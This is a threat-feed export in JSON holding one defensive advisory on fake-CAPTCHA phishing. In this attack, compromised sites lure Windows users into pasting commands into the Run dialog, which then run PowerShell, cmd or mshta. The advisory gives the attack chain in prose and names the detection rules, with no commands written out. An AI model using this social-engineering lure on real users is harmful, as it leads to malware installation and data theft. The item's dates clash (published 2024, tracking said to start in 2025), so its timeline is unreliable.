{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/captcha/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","SentinelOne Cloud Funnel","Crowdstrike"],"_cs_severities":["high"],"_cs_tags":["phishing","captcha","social-engineering","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","CrowdStrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies potential fake CAPTCHA phishing attacks targeting Windows users. The attack relies on compromised websites with browser injects that display fake CAPTCHAs or fake error messages. The user is then instructed to copy and paste a malicious command into the Windows Run dialog box, which executes via PowerShell, Cmd, or Mshta. This technique deceives users into running arbitrary code disguised as a legitimate verification or fix, potentially leading to malware installation or system compromise. The rule focuses on identifying suspicious command-line activity originating from explorer.exe, and containing CAPTCHA-related keywords, indicating a high likelihood of a phishing attempt. This activity started being tracked around August 2025 and continues to be a relevant threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser visits a compromised website displaying a fake CAPTCHA or error message.\u003c/li\u003e\n\u003cli\u003eThe website instructs the user to copy a command containing CAPTCHA-related keywords.\u003c/li\u003e\n\u003cli\u003eThe user pastes the command into the Windows Run dialog box.\u003c/li\u003e\n\u003cli\u003eExplorer.exe launches either PowerShell, cmd.exe, or mshta.exe.\u003c/li\u003e\n\u003cli\u003eThe launched process executes the malicious command.\u003c/li\u003e\n\u003cli\u003eThe malicious command may download and execute further payloads or scripts.\u003c/li\u003e\n\u003cli\u003eThese payloads can lead to malware installation or system compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access or control over the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of these attacks can lead to system compromise, data theft, or malware installation. Victims are tricked into running malicious commands, bypassing traditional security measures. The impact ranges from individual system infections to potential network-wide breaches if the initial foothold is used for lateral movement. A successful attack could result in significant data loss, financial damages, and reputational harm.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Fake CAPTCHA Phishing Attack via PowerShell\u0026rdquo; to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Fake CAPTCHA Phishing Attack via Mshta\u0026rdquo; to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules by examining the command line arguments, parent processes, and network connections.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to provide detailed information about process executions.\u003c/li\u003e\n\u003cli\u003eImplement user awareness training to educate users about the dangers of copying and pasting commands from untrusted websites.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:15:00Z","date_published":"2024-01-03T18:15:00Z","id":"/briefs/2024-01-fake-captcha/","summary":"This rule detects potential fake CAPTCHA phishing attacks on Windows systems where victims are tricked into copying and pasting malicious commands into the Windows Run dialog box.","title":"Potential Fake CAPTCHA Phishing Attack via Command Line","url":"https://feed.craftedsignal.io/briefs/2024-01-fake-captcha/"}],"language":"en","title":"CraftedSignal Threat Feed — Captcha","version":"https://jsonfeed.org/version/1.1"}